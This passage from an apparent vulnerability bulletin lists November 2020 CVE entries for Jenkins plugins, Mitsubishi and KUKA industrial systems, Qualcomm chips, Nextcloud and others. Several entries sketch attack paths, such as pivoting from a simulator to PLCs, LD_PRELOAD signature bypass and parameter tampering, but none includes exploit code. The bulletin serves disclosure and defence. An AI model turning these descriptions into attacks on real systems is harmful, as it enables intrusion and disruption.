Subrion CMS v4.2.1 allows XSS via the panel/phrases/ VALUE parameter. 2020-11-04 not yet calculated CVE-2019-7356
MISC
MISC
intermind — imind_server
 
Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user’s session by sending a malicious file in the chat. 2020-11-05 not yet calculated CVE-2020-25399
MISC
intermind — imind_server
 
CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality. 2020-11-05 not yet calculated CVE-2020-25398
MISC
ipfs — ipfs
 
An issue was discovered in IPFS (aka go-ipfs) 0.4.23. An attacker can generate ephemeral identities (Sybils) and leverage the IPFS connection management reputation system to poison other nodes’ routing tables, eclipsing the nodes that are the target of the attack from the rest of the network. Later versions, in particular go-ipfs 0.7, mitigate this. 2020-11-02 not yet calculated CVE-2020-10937
MISC
MISC
jenkins — active_directory_plugin
 
Jenkins Active Directory Plugin 2.19 and earlier allows attackers to log in as any user if a magic constant is used as the password. 2020-11-04 not yet calculated CVE-2020-2299
MLIST
CONFIRM
jenkins — active_directory_plugin
 
Jenkins Active Directory Plugin 2.19 and earlier allows attackers to log in as any user with any password while a successful authentication of that user is still in the optional cache when using Windows/ADSI mode. 2020-11-04 not yet calculated CVE-2020-2301
CONFIRM
jenkins — active_directory_plugin
 
Jenkins Active Directory Plugin 2.19 and earlier does not prohibit the use of an empty password in Windows/ADSI mode, which allows attackers to log in to Jenkins as any user depending on the configuration of the Active Directory server. 2020-11-04 not yet calculated CVE-2020-2300
MLIST
CONFIRM
jenkins — active_subversion_plugin
 
Jenkins Subversion Plugin 2.13.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2020-11-04 not yet calculated CVE-2020-2304
MLIST
CONFIRM
jenkins — ansible_plugin
 
Missing permission checks in Jenkins Ansible Plugin 1.0 and earlier allow attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2020-11-04 not yet calculated CVE-2020-2310
CONFIRM
jenkins — appspider_plugin
 
Jenkins AppSpider Plugin 1.0.12 and earlier stores a password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2020-11-04 not yet calculated CVE-2020-2314
CONFIRM
jenkins — findbugs_plugin
 
Jenkins FindBugs Plugin 5.0.0 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to Jenkins FindBugs Plugin’s post build step. 2020-11-04 not yet calculated CVE-2020-2317
CONFIRM
jenkins — kubernetes_plugin
 
Jenkins Kubernetes Plugin 1.27.3 and earlier allows low-privilege users to access possibly sensitive Jenkins controller environment variables. 2020-11-04 not yet calculated CVE-2020-2307
CONFIRM
jenkins — mail_commander_plugin
 
Jenkins Mail Commander Plugin for Jenkins-ci Plugin 1.0.0 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2020-11-04 not yet calculated CVE-2020-2318
CONFIRM
jenkins — mercurial_plugin
 
Jenkins Mercurial Plugin 2.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2020-11-04 not yet calculated CVE-2020-2305
CONFIRM
jenkins — sqlplus_script_runner_plugin
 
Jenkins SQLPlus Script Runner Plugin 2.0.12 and earlier does not mask a password provided as command line argument in build logs. 2020-11-04 not yet calculated CVE-2020-2312
CONFIRM
jenkins — static_analysis_utilities_plugin
 
Jenkins Static Analysis Utilities Plugin 1.96 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-11-04 not yet calculated CVE-2020-2316
CONFIRM
jenkins — visualworks_store_plugin
 
Jenkins Visualworks Store Plugin 1.1.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2020-11-04 not yet calculated CVE-2020-2315
CONFIRM
jenkins — vmware_lab_manager_slaves_plugin
 
Jenkins VMware Lab Manager Slaves Plugin 0.2.8 and earlier stores a password unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2020-11-04 not yet calculated CVE-2020-2319
CONFIRM
joomla — jomsocial
 
JomSocial (Joomla Social Network Extention) 4.7.6 allows CSV injection via a customer’s profile. 2020-11-04 not yet calculated CVE-2020-22274
MISC
MISC
MISC
joplin — joplin
 
Joplin 1.2.6 for Desktop allows XSS via a LINK element in a note. 2020-11-06 not yet calculated CVE-2020-28249
MISC
MISC
kuka — visual_components
 
Visual Components (owned by KUKA) is a robotic simulator that allows simulating factories and robots in order toimprove planning and decision-making processes. Visual Components software requires a special license which can beobtained from a network license server. The network license server binds to all interfaces (0.0.0.0) and listensfor packets over UDP port 5093. No authentication/authorization is required in order to communicate with theserver. The protocol being used is a property protocol by RMS Sentinel which provides the licensing infrastructurefor the network license server. RMS Sentinel license manager service exposes UDP port 5093 which provides sensitivesystem information that could be leveraged for further exploitation without any kind of authentication. Thisinformation includes detailed hardware and OS characteristics.After a decryption process, a textual protocol is found which contains a simple header with the requested command,application-identifier, and some arguments. The protocol is vulnerable to DoS through an arbitrary pointerderreference. This flaw allows an attacker to to pass a specially crafted package that, when processed by theservice, causes an arbitrary pointer from the stack to be dereferenced, causing an uncaught exception thatterminates the service. This can be further contructed in combination with RVDP#710 which exploits an informationdisclosure leak, or with RVDP#711 for an stack-overflow and potential code execution.Beyond denying simulations, Visual Components provides capabilities to interface with industrial machinery andautomate certain processes (e.g. testing, benchmarking, etc.) which depending on the DevOps setup might beintegrated into the industrial flow. Accordingly, a DoS in the simulation might have higher repercusions, dependingon the Industrial Control System (ICS) ICS infrastructure. 2020-11-06 not yet calculated CVE-2020-10292
CONFIRM
kuka — visual_components
 
Visual Components (owned by KUKA) is a robotic simulator that allows simulating factories and robots in order toimprove planning and decision-making processes. Visual Components software requires a special license which can beobtained from a network license server. The network license server binds to all interfaces (0.0.0.0) and listensfor packets over UDP port 5093. No authentication/authorization is required in order to communicate with theserver. The protocol being used is a property protocol by RMS Sentinel which provides the licensing infrastructurefor the network license server. RMS Sentinel license manager service exposes UDP port 5093 which provides sensitivesystem information that could be leveraged for further exploitation without any kind of authentication. Thisinformation includes detailed hardware and OS characteristics.After a decryption process, a textual protocol is found which contains a simple header with the requested command,application-identifier, and some arguments. The protocol leaks information regarding the receiving serverinformation, license information and managing licenses, among others.Through this flaw, attackers can retreive information about a KUKA simulation system, particularly, the version ofthe licensing server, which is connected to the simulator, and which will allow them to launch local simulationswith similar characteristics, further understanding the dynamics of motion virtualization and opening doors toother attacks (see RVDP#711 and RVDP#712 for subsequent vulnerabilities that compromise integrity andavailability).Beyond compromising simulations, Visual Components provides capabilities to interface with industrial machinery.Particularly, their PLC Connectivity feature ‘makes it easy’ to connect simulations with control systems usingeither the industry standard OPC UA or other supported vendor specific interfaces. This fills the gap of jumpingfrom simulation to real and enables attackers to pivot from the Visual Components simulator to robots or otherIndustrial Control System (ICS) devices, such as PLCs. 2020-11-06 not yet calculated CVE-2020-10291
CONFIRM
libmaxminddb — libmaxminddb
 
libmaxminddb before 1.4.3 has a heap-based buffer over-read in dump_entry_data_list in maxminddb.c. 2020-11-06 not yet calculated CVE-2020-28241
MISC
MISC
MISC
lightbend — play_framework
 
In Play Framework 2.6.0 through 2.8.2, data amplification can occur when an application accepts multipart/form-data JSON input. 2020-11-06 not yet calculated CVE-2020-26882
MISC
MISC
lightbend — play_framework
 
In Play Framework 2.6.0 through 2.8.2, stack consumption can occur because of unbounded recursion during parsing of crafted JSON documents. 2020-11-06 not yet calculated CVE-2020-26883
MISC
MISC
lightbend — play_framework
 
An issue was discovered in PlayJava in Play Framework 2.6.0 through 2.8.2. The body parsing of HTTP requests eagerly parses a payload given a Content-Type header. A deep JSON structure sent to a valid POST endpoint (that may or may not expect JSON payloads) causes a StackOverflowError and Denial of Service. 2020-11-06 not yet calculated CVE-2020-27196
MISC
MISC
linux — linux_kernel
 
An issue was discovered in ioapic_lazy_update_eoi in arch/x86/kvm/ioapic.c in the Linux kernel before 5.9.2. It has an infinite loop related to improper interaction between a resampler and edge triggering, aka CID-77377064c3a9. 2020-11-06 not yet calculated CVE-2020-27152
MLIST
MISC
CONFIRM
CONFIRM
linux — swift
 
A stack overflow issue existed in Swift for Linux. The issue was addressed with improved input validation for dealing with deeply nested malicious JSON input. 2020-11-02 not yet calculated CVE-2020-9861
MISC
marmind — marmind
 
An Authorization Bypass vulnerability in the Marmind web application with version 4.1.141.0 allows users with lower privileges to gain control to files uploaded by administrative users. The accessed files were not visible by the low privileged users in the web GUI. 2020-11-05 not yet calculated CVE-2020-26506
MISC
MISC
marmind — marmind
 
A CSV Injection (also known as Formula Injection) vulnerability in the Marmind web application with version 4.1.141.0 allows malicious users to gain remote control of other computers. By providing formula code in the “Notes” functionality in the main screen, an attacker can inject a payload into the “Description” field under the “Insert To-Do” option. Other users might download this data, for example a CSV file, and execute the malicious commands on their computer by opening the file using a software such as Microsoft Excel. The attacker could gain remote access to the user’s PC. 2020-11-05 not yet calculated CVE-2020-26507
MISC
MISC
microfocus — self_service_password_reset
 
Sensitive information disclosure vulnerability in Micro Focus Self Service Password Reset (SSPR) product. The vulnerability affects versions 4.4.0.0 to 4.4.0.6 and 4.5.0.1 and 4.5.0.2. In certain configurations the vulnerability could disclose sensitive information. 2020-11-05 not yet calculated CVE-2020-25837
MISC
misp-project — misp
 
MISP through 2.4.133 allows SSRF in the REST client via the use_full_path parameter with an arbitrary URL. 2020-11-02 not yet calculated CVE-2020-28043
MISC
mit — kerberos5
 
MIT Kerberos 5 (aka krb5) before 1.17.2 and 1.18.x before 1.18.3 allows unbounded recursion via an ASN.1-encoded Kerberos message because the lib/krb5/asn.1/asn1_encode.c support for BER indefinite lengths lacks a recursion limit. 2020-11-06 not yet calculated CVE-2020-28196
CONFIRM
MLIST
FEDORA
mitsubishi_electric — gt14_model_of_got_1000_series Resource management error vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5649
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got_1000_series
 
Improper access control vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5647
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got_1000_series
 
Improper neutralization of argument delimiters in a command (‘Argument Injection’) vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows unauthenticated attackers on adjacent network to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5648
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got_1000_series
 
NULL pointer dereferences vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5646
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got_1000_series
 
Buffer overflow vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5644
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got_1000_series
 
Session fixation vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5645
MISC
MISC
MISC
MISC
mitsubishi_electric — melsec_iq
 
Uncontrolled resource consumption vulnerability in Ethernet Port on MELSEC iQ-R, Q and L series CPU modules (R 00/01/02 CPU firmware versions ’20’ and earlier, R 04/08/16/32/120 (EN) CPU firmware versions ’52’ and earlier, R 08/16/32/120 SFCPU firmware versions ’22’ and earlier, R 08/16/32/120 PCPU all versions, R 08/16/32/120 PSFCPU all versions, R 16/32/64 MTCPU all versions, Q03 UDECPU, Q 04/06/10/13/20/26/50/100 UDEHCPU serial number ‘22081’ and earlier , Q 03/04/06/13/26 UDVCPU serial number ‘22031’ and earlier, Q 04/06/13/26 UDPVCPU serial number ‘22031’ and earlier, Q 172/173 DCPU all versions, Q 172/173 DSCPU all versions, Q 170 MCPU all versions, Q 170 MSCPU all versions, L 02/06/26 CPU (-P) and L 26 CPU – (P) BT all versions) allows a remote unauthenticated attacker to stop the Ethernet communication functions of the products via a specially crafted packet, which may lead to a denial of service (DoS) condition . 2020-11-02 not yet calculated CVE-2020-5652
MISC
MISC
MISC
mitsubishi_electric — melsec_iq-r_series Resource Management Errors vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are ’02’ or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are ’01’ or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are ’08’ or before, RD81MES96N MES Interface Module First 2 digits of serial number are ’04’ or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are ’04’ or before) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-02 not yet calculated CVE-2020-5658
MISC
MISC
MISC
mitsubishi_electric — melsec_iq-r_series Improper neutralization of argument delimiters in a command (‘Argument Injection’) vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are ’02’ or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are ’01’ or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are ’08’ or before, RD81MES96N MES Interface Module First 2 digits of serial number are ’04’ or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are ’04’ or before) allows unauthenticated attackers on adjacent network to stop the network functions of the products via a specially crafted packet. 2020-11-02 not yet calculated CVE-2020-5657
MISC
MISC
MISC
mitsubishi_electric — melsec_iq-r_series
 
NULL pointer dereferences vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are ’02’ or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are ’01’ or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are ’08’ or before, RD81MES96N MES Interface Module First 2 digits of serial number are ’04’ or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are ’04’ or before) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-02 not yet calculated CVE-2020-5655
MISC
MISC
MISC
mitsubishi_electric — melsec_iq-r_series
 
Improper access control vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are ’02’ or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are ’01’ or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are ’08’ or before, RD81MES96N MES Interface Module First 2 digits of serial number are ’04’ or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are ’04’ or before) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet. 2020-11-02 not yet calculated CVE-2020-5656
MISC
MISC
MISC
mitsubishi_electric — melsec_iq-r_series
 
Session fixation vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are ’02’ or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are ’01’ or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are ’08’ or before, RD81MES96N MES Interface Module First 2 digits of serial number are ’04’ or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are ’04’ or before) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-02 not yet calculated CVE-2020-5654
MISC
MISC
MISC
mitsubishi_electric — melsec_iq-r_series
 
Buffer overflow vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are ’02’ or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are ’01’ or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are ’08’ or before, RD81MES96N MES Interface Module First 2 digits of serial number are ’04’ or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are ’04’ or before) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet. 2020-11-02 not yet calculated CVE-2020-5653
MISC
MISC
MISC
moxa — mxview
 
An exploitable local privilege elevation vulnerability exists in the file system permissions of Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary. By default MXViewService, which starts as a NT SYSTEM authority user executes a series of Node.Js scripts to start additional application functionality. 2020-11-05 not yet calculated CVE-2020-13536
MISC
moxa — mxview
 
An exploitable local privilege elevation vulnerability exists in the file system permissions of Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary.By default MXViewService, which starts as a NT SYSTEM authority user executes a series of Node.Js scripts to start additional application functionality and among them the mosquitto executable is also run. 2020-11-05 not yet calculated CVE-2020-13537
MISC
moxa — vport_461_firmware
 
A command injection vulnerability exists in Moxa Inc VPort 461 Series Firmware Version 3.4 or lower that could allow a remote attacker to execute arbitrary commands in Moxa’s VPort 461 Series Industrial Video Servers. 2020-11-02 not yet calculated CVE-2020-23639
MISC
nats — jwt_library
 
The JWT library in NATS nats-server before 2.1.9 has Incorrect Access Control because of how expired credentials are handled. 2020-11-06 not yet calculated CVE-2020-26892
MISC
CONFIRM
nats — jwt_library
 
The JWT library in NATS nats-server before 2.1.9 allows a denial of service (a nil dereference in Go code). 2020-11-06 not yet calculated CVE-2020-26521
CONFIRM
MISC
neoflex — video_subscritpion_system
 
Neoflex Video Subscription System Version 2.0 is affected by CSRF which allows the Website’s Settings to be changed (such as Payment Settings) 2020-11-04 not yet calculated CVE-2020-22273
MISC
MISC
nessus — nessus_for_windows_and_nessus_agent A vulnerability in Nessus versions 8.9.0 through 8.12.0 for Windows & Nessus Agent 8.0.0 and 8.1.0 for Windows could allow an authenticated local attacker to copy user-supplied files to a specially constructed path in a specifically named user directory. An attacker could exploit this vulnerability by creating a malicious file and copying the file to a system directory. The attacker needs valid credentials on the Windows system to exploit this vulnerability. 2020-11-05 not yet calculated CVE-2020-5793
MISC
MISC
nessus — network_monitor
 
A vulnerability in Nessus Network Monitor versions 5.11.0, 5.11.1, and 5.12.0 for Windows could allow an authenticated local attacker to execute arbitrary code by copying user-supplied files to a specially constructed path in a specifically named user directory. The attacker needs valid credentials on the Windows system to exploit this vulnerability. 2020-11-06 not yet calculated CVE-2020-5794
MISC
netapp — santricity_os_controller_software
 
SANtricity OS Controller Software versions 11.30 and higher are susceptible to a vulnerability which allows an unauthenticated attacker with access to the system to cause a Denial of Service (DoS). 2020-11-06 not yet calculated CVE-2020-8580
MISC
netapp — santricity_os_controller_software
 
SANtricity OS Controller Software versions 11.50.1 and higher are susceptible to a vulnerability which could allow an attacker to discover sensitive information by intercepting its transmission within an https session. 2020-11-06 not yet calculated CVE-2020-8577
MISC
netgear — nighthawk_r7000_devices
 
The SIP ALG implementation on NETGEAR Nighthawk R7000 1.0.9.64_10.2.64 devices allows remote attackers to communicate with arbitrary TCP and UDP services on a victim’s intranet machine, if the victim visits an attacker-controlled web site with a modern browser, aka NAT Slipstreaming. This occurs because the ALG takes action based on an IP packet with an initial REGISTER substring in the TCP data, and the correct intranet IP address in the subsequent Via header, without properly considering that connection progress and fragmentation affect the meaning of the packet data. 2020-11-02 not yet calculated CVE-2020-28041
MISC
MISC
MISC
MISC
nextcloud — nextcloud_server
 
A wrong configuration in Nextcloud Server 19.0.1 incorrectly made the user feel the passwordless WebAuthn is also a two factor verification by asking for the PIN of the passwordless WebAuthn but not verifying it. 2020-11-02 not yet calculated CVE-2020-8236
MISC
MISC
nextcloud — nextcloud_server
 
A logic error in Nextcloud Server 19.0.0 caused a plaintext storage of the share password when it was given on the initial create API call. 2020-11-02 not yet calculated CVE-2020-8183
MISC
MISC
nextcloud — nextcloud_server
 
A too small set of random characters being used for encryption in Nextcloud Server 18.0.4 allowed decryption in shorter time than intended. 2020-11-02 not yet calculated CVE-2020-8173
MISC
MISC
openfind — mailgates_and_mailaudit
 
MailGates and MailAudit products contain Command Injection flaw, which can be used to inject and execute system commands from the cgi parameter after attackers obtain the user’s access token. 2020-11-01 not yet calculated CVE-2020-25849
CONFIRM
opensuse — opesuse
 
An issue was discovered in SDDM before 0.19.0. It incorrectly starts the X server in a way that – for a short time period – allows local unprivileged users to create a connection to the X server without providing proper authentication. A local attacker can thus access X server display contents and, for example, intercept keystrokes or access the clipboard. This is caused by a race condition during Xauthority file creation. 2020-11-04 not yet calculated CVE-2020-28049
SUSE
MISC
MISC
MISC
MLIST
DEBIAN
oracle — weblogic_server
 
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-11-02 not yet calculated CVE-2020-14750
MISC
origin — origin_client
 
A vulnerability exists in the Origin Client that could allow a non-Administrative user to elevate their access to either Administrator or System. Once the user has obtained elevated access, they may be able to take control of the system and perform actions otherwise reserved for high privileged users or system Administrators. 2020-11-02 not yet calculated CVE-2020-27708
MISC
origin — origin_client
 
A cross-site scripting (XSS) vulnerability exists in the Origin Client that could allow a remote attacker to execute arbitrary Javascript in a target user’s Origin client. An attacker could use this vulnerability to access sensitive data related to the target user’s Origin account, or to control or monitor the Origin text chat window. 2020-11-02 not yet calculated CVE-2020-15914
MISC
osticket — osticket
 
SSRF exists in osTicket before 1.14.3, where an attacker can add malicious file to server or perform port scanning. 2020-11-02 not yet calculated CVE-2020-24881
MISC
MISC
pax — point_of_sale_device
 
An attacker with physical access to a PAX Point Of Sale device with ProlinOS through 2.4.161.8859R can boot it in management mode, enable the XCB service, and then list, read, create, and overwrite files with MAINAPP permissions. 2020-11-02 not yet calculated CVE-2020-28044
MISC
pax — prolinos
 
An issue was discovered in ProlinOS through 2.4.161.8859R. An attacker with local code execution privileges as a normal user (MAINAPP) can escalate to root privileges by exploiting the setuid installation of the xtables-multi binary and leveraging the ip6tables –modprobe switch. 2020-11-02 not yet calculated CVE-2020-28046
MISC
pax — prolinos
 
An unsigned-library issue was discovered in ProlinOS through 2.4.161.8859R. This OS requires installed applications and all system binaries to be signed either by the manufacturer or by the Point Of Sale application developer and distributor. The signature is a 2048-byte RSA signature verified in the kernel prior to ELF execution. Shared libraries, however, do not need to be signed, and they are not verified. An attacker may execute a custom binary by compiling it as a shared object and loading it via LD_PRELOAD. 2020-11-02 not yet calculated CVE-2020-28045
MISC
qemu — qemu ati_2d_blt in hw/display/ati_2d.c in QEMU 4.2.1 can encounter an outside-limits situation in a calculation. A guest can crash the QEMU process. 2020-11-06 not yet calculated CVE-2020-27616
CONFIRM
MISC
qemu — qemu
 
eth_get_gso_type in net/eth.c in QEMU 4.2.1 allows guest OS users to trigger an assertion failure. A guest can crash the QEMU process via packet data that lacks a valid Layer 3 protocol. 2020-11-06 not yet calculated CVE-2020-27617
CONFIRM
MISC
qualcomm — multiple_snapdragon_products
 
u’Third-party app may also call the broadcasts in Perfdump and cause privilege escalation issue due to improper access control’ in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8096AU, APQ8098, Bitra, Kamorta, MSM8909W, MSM8917, MSM8940, Nicobar, QCA6390, QCM2150, QCS605, Rennell, SA6155P, SA8155P, Saipan, SDA660, SDM429W, SDM450, SDM630, SDM636, SDM660, SDM670, SDM710, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 not yet calculated CVE-2020-11164
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Possible buffer overflow in MHI driver due to lack of input parameter validation of EOT events received from MHI device side’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9607, MSM8917, MSM8953, Nicobar, QCA6390, QCM2150, QCS404, QCS405, QCS605, QM215, QRB5165, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM710, SDM845, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130 2020-11-02 not yet calculated CVE-2020-11162
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Bluetooth devices does not properly restrict the L2CAP payload length allowing users in radio range to cause a buffer overflow via a crafted Link Layer packet(Equivalent to CVE-2019-17060,CVE-2019-17061 and CVE-2019-17517 in Sweyntooth paper)’ in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music in AR9344 2020-11-02 not yet calculated CVE-2020-11114
CONFIRM
red_hat — red_hat
 
A Red Hat only CVE-2020-12352 regression issue was found in the way the Linux kernel’s Bluetooth stack implementation handled the initialization of stack memory when handling certain AMP packets. This flaw allows a remote attacker in an adjacent range to leak small portions of stack memory on the system by sending specially crafted AMP packets. The highest threat from this vulnerability is to data confidentiality. 2020-11-05 not yet calculated CVE-2020-25662
CONFIRM
CONFIRM
CONFIRM
red_hat — red_hat
 
A Red Hat only CVE-2020-12351 regression issue was found in the way the Linux kernel’s Bluetooth implementation handled L2CAP packets with A2MP CID. This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or potentially executing arbitrary code on the system by sending a specially crafted L2CAP packet. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. 2020-11-05 not yet calculated CVE-2020-25661
CONFIRM
CONFIRM
CONFIRM
redcap — redcap
 
An issue was discovered in REDCap 8.11.6 through 9.x before 10. The messenger’s CSV feature (that allows users to export their conversation threads as CSV) allows non-privileged users to export one another’s conversation threads by changing the thread_id parameter in the request to the endpoint Messenger/messenger_download_csv.php?title=Hey&thread_id={THREAD_ID}. 2020-11-02 not yet calculated CVE-2020-27358
MISC
MISC
MISC
relish — verve_connect_vh510_devices The Relish (Verve Connect) VH510 device with firmware before 1.0.1.6L0516 allows XSS via URLBlocking Settings, SNMP Settings, and System Log Settings. 2020-11-04 not yet calculated CVE-2020-27691
MISC
MISC
relish — verve_connect_vh510_devices
 
The Relish (Verve Connect) VH510 device with firmware before 1.0.1.6L0516 contains multiple CSRF vulnerabilities within its web management portal. Attackers can, for example, use this to update the TR-069 configuration server settings (responsible for managing devices remotely). This makes it possible to remotely reboot the device or upload malicious firmware. 2020-11-04 not yet calculated CVE-2020-27692
MISC
MISC
relish — verve_connect_vh510_devices
 
The Relish (Verve Connect) VH510 device with firmware before 1.0.1.6L0516 contains undocumented default admin credentials for the web management interface. A remote attacker could exploit this vulnerability to login and execute commands on the device, as well as upgrade the firmware image to a malicious version. 2020-11-04 not yet calculated CVE-2020-27689
MISC
MISC
relish — verve_connect_vh510_devices
 
